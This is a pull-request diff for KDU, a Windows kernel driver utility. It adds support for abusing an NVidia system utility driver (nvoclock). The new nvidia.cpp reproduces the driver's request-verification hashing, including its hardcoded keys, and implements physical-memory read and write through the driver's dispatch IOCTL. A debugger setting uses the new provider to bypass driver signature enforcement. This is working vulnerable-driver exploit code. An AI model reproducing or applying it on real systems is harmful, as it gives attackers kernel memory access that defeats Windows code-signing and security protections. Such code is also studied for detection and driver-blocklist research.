Merge pull request hfiref0x#77 from hfiref0x/dev134

v 1.3.4

README.md

@@ -144,6 +144,7 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
 | 37          | Pavel Yosifovich | KObjExp  | Kernel Object Explorer          | Original          | Undefined              |                      |
 | 38          | Pavel Yosifovich | KRegExp  | Kernel Registry Explorer        | Original          | Undefined              |                      |
 | 39          | Inspect Element LTD | EchoDrv  | Echo AntiCheat (spyware)     | Original          | Undefined              |                      |
+| 40          | NVidia | nvoclock  | NVidia System Utility Driver     | Original          | 7.0.0.32              |                      |
 
 ###### *At commit time, data maybe inaccurate.
 
@@ -186,6 +187,7 @@ Using this program might crash your computer with BSOD. Compiled binary and sour
 # Third party code usage
 
 * TinyAES, https://github.com/kokke/tiny-AES-c
+* whirlpool, https://github.com/mabako/mta-whirlpool
 
 # References
 
@@ -209,6 +211,7 @@ Using this program might crash your computer with BSOD. Compiled binary and sour
 * CVE-2022-3699, https://github.com/alfarom256/CVE-2022-3699
 * LOLDrivers, https://www.loldrivers.io
 * ECHOH NO, https://github.com/kite03/echoac-poc/
+* NVDrv, https://github.com/zer0condition/NVDrv
 
 # Wormhole drivers code
 

Source/Hamakaze/KDU.vcxproj

@@ -129,7 +129,8 @@
     <ClCompile Include="..\Shared\minirtl\_strncmp.c" />
     <ClCompile Include="..\Shared\minirtl\_strncpy.c" />
     <ClCompile Include="..\Shared\ntos\ntsup.c" />
-    <ClCompile Include="..\Shared\tinyaes\aes.c" />
+    <ClCompile Include="..\Shared\thirdparty\tinyaes\aes.c" />
+    <ClCompile Include="..\Shared\thirdparty\whirlpool\whirlpool.c" />
     <ClCompile Include="compress.cpp" />
     <ClCompile Include="drvmap.cpp" />
     <ClCompile Include="dsefix.cpp" />
@@ -150,6 +151,7 @@
     <ClCompile Include="idrv\mapmem.cpp" />
     <ClCompile Include="idrv\marvinhw.cpp" />
     <ClCompile Include="idrv\mimidrv.cpp" />
+    <ClCompile Include="idrv\nvidia.cpp" />
     <ClCompile Include="idrv\phymem.cpp" />
     <ClCompile Include="idrv\procexp.cpp" />
     <ClCompile Include="idrv\ryzen.cpp" />
@@ -184,7 +186,9 @@
     <ClInclude Include="..\Shared\ntos\ntbuilds.h" />
     <ClInclude Include="..\Shared\ntos\ntos.h" />
     <ClInclude Include="..\Shared\ntos\ntsup.h" />
-    <ClInclude Include="..\Shared\tinyaes\aes.h" />
+    <ClInclude Include="..\Shared\thirdparty\tinyaes\aes.h" />
+    <ClInclude Include="..\Shared\thirdparty\whirlpool\nessie.h" />
+    <ClInclude Include="..\Shared\thirdparty\whirlpool\whirlpool.h" />
     <ClInclude Include="compress.h" />
     <ClInclude Include="drvmap.h" />
     <ClInclude Include="dsefix.h" />
@@ -207,6 +211,7 @@
     <ClInclude Include="idrv\mapmem.h" />
     <ClInclude Include="idrv\marvinhw.h" />
     <ClInclude Include="idrv\mimidrv.h" />
+    <ClInclude Include="idrv\nvidia.h" />
     <ClInclude Include="idrv\phymem.h" />
     <ClInclude Include="idrv\procexp.h" />
     <ClInclude Include="idrv\ryzen.h" />

Source/Hamakaze/KDU.vcxproj.filters

@@ -25,12 +25,18 @@
     <Filter Include="ntos">
       <UniqueIdentifier>{1df1a36e-45d4-430a-a401-9415b50be4bd}</UniqueIdentifier>
     </Filter>
-    <Filter Include="tinyaes">
-      <UniqueIdentifier>{c53b77e9-0d5d-4eb3-91d8-1b71f16abd1d}</UniqueIdentifier>
-    </Filter>
     <Filter Include="ldr">
       <UniqueIdentifier>{f8e96a37-9fb4-4dd5-a6aa-a517a8f1d6db}</UniqueIdentifier>
     </Filter>
+    <Filter Include="thirdparty">
+      <UniqueIdentifier>{98544574-94e6-4641-b98d-4a06905c61bd}</UniqueIdentifier>
+    </Filter>
+    <Filter Include="thirdparty\tinyaes">
+      <UniqueIdentifier>{c53b77e9-0d5d-4eb3-91d8-1b71f16abd1d}</UniqueIdentifier>
+    </Filter>
+    <Filter Include="thirdparty\whirlpool">
+      <UniqueIdentifier>{a336b00d-e024-4c89-9e15-64de5a7c6257}</UniqueIdentifier>
+    </Filter>
   </ItemGroup>
   <ItemGroup>
     <ClCompile Include="main.cpp">
@@ -93,9 +99,6 @@
     <ClCompile Include="idrv\lha.cpp">
       <Filter>Source Files\idrv</Filter>
     </ClCompile>
-    <ClCompile Include="..\Shared\tinyaes\aes.c">
-      <Filter>tinyaes</Filter>
-    </ClCompile>
     <ClCompile Include="..\Shared\minirtl\_filename.c">
       <Filter>minirtl</Filter>
     </ClCompile>
@@ -201,6 +204,15 @@
     <ClCompile Include="idrv\echodrv.cpp">
       <Filter>Source Files\idrv</Filter>
     </ClCompile>
+    <ClCompile Include="..\Shared\thirdparty\tinyaes\aes.c">
+      <Filter>thirdparty\tinyaes</Filter>
+    </ClCompile>
+    <ClCompile Include="..\Shared\thirdparty\whirlpool\whirlpool.c">
+      <Filter>thirdparty\whirlpool</Filter>
+    </ClCompile>
+    <ClCompile Include="idrv\nvidia.cpp">
+      <Filter>Source Files\idrv</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="global.h">
@@ -269,9 +281,6 @@
     <ClInclude Include="idrv\lha.h">
       <Filter>Source Files\idrv</Filter>
     </ClInclude>
-    <ClInclude Include="..\Shared\tinyaes\aes.h">
-      <Filter>tinyaes</Filter>
-    </ClInclude>
     <ClInclude Include="..\Shared\ntos\halamd64.h">
       <Filter>ntos</Filter>
     </ClInclude>
@@ -377,6 +386,18 @@
     <ClInclude Include="idrv\echodrv.h">
       <Filter>Source Files\idrv</Filter>
     </ClInclude>
+    <ClInclude Include="..\Shared\thirdparty\tinyaes\aes.h">
+      <Filter>thirdparty\tinyaes</Filter>
+    </ClInclude>
+    <ClInclude Include="..\Shared\thirdparty\whirlpool\nessie.h">
+      <Filter>thirdparty\whirlpool</Filter>
+    </ClInclude>
+    <ClInclude Include="..\Shared\thirdparty\whirlpool\whirlpool.h">
+      <Filter>thirdparty\whirlpool</Filter>
+    </ClInclude>
+    <ClInclude Include="idrv\nvidia.h">
+      <Filter>Source Files\idrv</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <ResourceCompile Include="resource.rc">

Source/Hamakaze/KDU.vcxproj.user

@@ -5,7 +5,7 @@
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LocalDebuggerCommandArguments>-prv 39 -map c:\install\dummy.sys</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>-prv 40 -dse 6</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
 </Project>

Source/Hamakaze/idrv/nvidia.cpp

@@ -0,0 +1,142 @@
+/*******************************************************************************
+*
+*  (C) COPYRIGHT AUTHORS, 2023
+*
+*  TITLE:       NVIDIA.CPP
+*
+*  VERSION:     1.34
+*
+*  DATE:        16 Sep 2023
+*
+*  NVidia drivers routines.
+* 
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+#include "idrv/nvidia.h"
+
+#ifdef __cplusplus
+extern "C" {
+#include "../Shared/thirdparty/whirlpool/whirlpool.h"
+}
+#endif
+
+//
+// Nvo based on https://github.com/zer0condition/NVDrv
+//
+
+VOID whirlpool(
+    _In_ PVOID pcData,
+    _In_ ULONG cbData, 
+    _Inout_ PVOID result)
+{
+    NESSIEstruct structpointer;
+
+    NESSIEinit(&structpointer);
+    NESSIEadd((const PUCHAR)pcData, 8 * cbData, &structpointer);
+    NESSIEfinalize(&structpointer, (PUCHAR)result);
+}
+
+/*
+* NvoEncryptRequest
+*
+* Purpose:
+*
+* Encrypts request for driver side verification.
+* Exact code ripped from driver.
+*
+*/
+VOID NvoEncryptRequest(
+    _In_ PVOID Request,
+    _In_ ULONG Size,
+    _In_ PVOID EncryptedKey
+)
+{
+    char key_value2[64]; 
+    char key_value1[64]; 
+    char result1[256];
+    char result2[312];
+
+    _strcpy_a(key_value1, "Dfasd0981=kFGdv'df,b;lsk"); //random bullshit go
+    memset(&key_value1[25], 0, 39);
+    _strcpy_a(key_value2, "kasjhf923uasdfkYYE-=~");
+    memset(&key_value2[22], 0, 42);
+    memset(result1, 0, sizeof(result1));
+    memset(result2, 0, 256);
+    whirlpool(Request, Size, &result1);
+    RtlCopyMemory(&result1[64], key_value1, 64ui64);
+    whirlpool(&result1, 128, &result2);
+    RtlCopyMemory(&result2[64], key_value2, 64ui64);
+    whirlpool(&result2, 128, EncryptedKey);
+}
+
+/*
+* NvoReadPhysicalMemory
+*
+* Purpose:
+*
+* Read from physical memory.
+*
+*/
+BOOL WINAPI NvoReadPhysicalMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR PhysicalAddress,
+    _In_ PVOID Buffer,
+    _In_ ULONG NumberOfBytes)
+{
+    NVOCLOCK_REQUEST request;
+
+    RtlSecureZeroMemory(&request, sizeof(request));
+
+    request.FunctionId = NV_FUNCID_PHYS_READ;
+    request.Size = NumberOfBytes;
+    request.Destination = Buffer;
+    request.Source = (PVOID)PhysicalAddress;
+
+    NvoEncryptRequest(&request, 0x38, &request.EncryptKey);
+
+    return supCallDriver(DeviceHandle,
+        IOCTL_NVOCLOCK_DISPATCH,
+        &request,
+        sizeof(request),
+        &request,
+        sizeof(request));
+}
+
+/*
+* NvoWritePhysicalMemory
+*
+* Purpose:
+*
+* Write to physical memory.
+*
+*/
+BOOL WINAPI NvoWritePhysicalMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR PhysicalAddress,
+    _In_ PVOID Buffer,
+    _In_ ULONG NumberOfBytes)
+{
+    NVOCLOCK_REQUEST request;
+
+    RtlSecureZeroMemory(&request, sizeof(request));
+
+    request.FunctionId = NV_FUNCID_PHYS_WRITE;
+    request.Size = NumberOfBytes;
+    request.Destination = (PVOID)PhysicalAddress;
+    request.Source = Buffer;
+
+    NvoEncryptRequest(&request, 0x38, &request.EncryptKey);
+
+    return supCallDriver(DeviceHandle,
+        IOCTL_NVOCLOCK_DISPATCH,
+        &request,
+        sizeof(request),
+        &request,
+        sizeof(request));
+}

Source/Hamakaze/idrv/nvidia.h

@@ -0,0 +1,57 @@
+/*******************************************************************************
+*
+*  (C) COPYRIGHT AUTHORS, 2023
+*
+*  TITLE:       NVIDIA.H
+*
+*  VERSION:     1.34
+*
+*  DATE:        16 Sep 2023
+*
+*  NVidia drivers interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+#define NV_FUNCID_READ_CRX   0x0
+#define NV_FUNCID_WRITE_CRX  0x1
+#define NV_FUNCID_PHYS_READ  0x14
+#define NV_FUNCID_PHYS_WRITE 0x15
+
+#define FILE_DEVICE_NVOCLOCK  (DWORD)0x9C40
+
+#define NVOCLOCK_DISPATCH     (DWORD)0x921
+
+#define IOCTL_NVOCLOCK_DISPATCH  \
+	CTL_CODE(FILE_DEVICE_NVOCLOCK, NVOCLOCK_DISPATCH, METHOD_BUFFERED, FILE_WRITE_ACCESS) //0x9C40A484
+
+//
+// Multipurpose structure, other defines are irrelevant, size is 0x138 and checked in handlers.
+//
+typedef struct _NVOCLOCK_REQUEST {
+    ULONG FunctionId; //NV_FUNCID_*
+    ULONG Size;
+    PVOID Destination;
+    PVOID Source;
+    BYTE OutputBuffer[32];
+    BYTE EncryptKey[64]; //encrypted message here
+    BYTE Reserved0[192];
+} NVOCLOCK_REQUEST, * PNVOCLOCK_REQUEST;
+
+BOOL WINAPI NvoReadPhysicalMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR PhysicalAddress,
+    _In_ PVOID Buffer,
+    _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI NvoWritePhysicalMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR PhysicalAddress,
+    _In_ PVOID Buffer,
+    _In_ ULONG NumberOfBytes);

Source/Hamakaze/idrv/winio.cpp

@@ -4,9 +4,9 @@
 *
 *  TITLE:       WINIO.CPP
 *
-*  VERSION:     1.31
+*  VERSION:     1.34
 *
-*  DATE:        14 Apr 2023
+*  DATE:        14 Sep 2023
 *
 *  WINIO based drivers routines.
 *
@@ -23,7 +23,7 @@
 
 #ifdef __cplusplus
 extern "C" {
-#include "../Shared/tinyaes/aes.h"
+#include "../Shared/thirdparty/tinyaes/aes.h"
 }
 #endif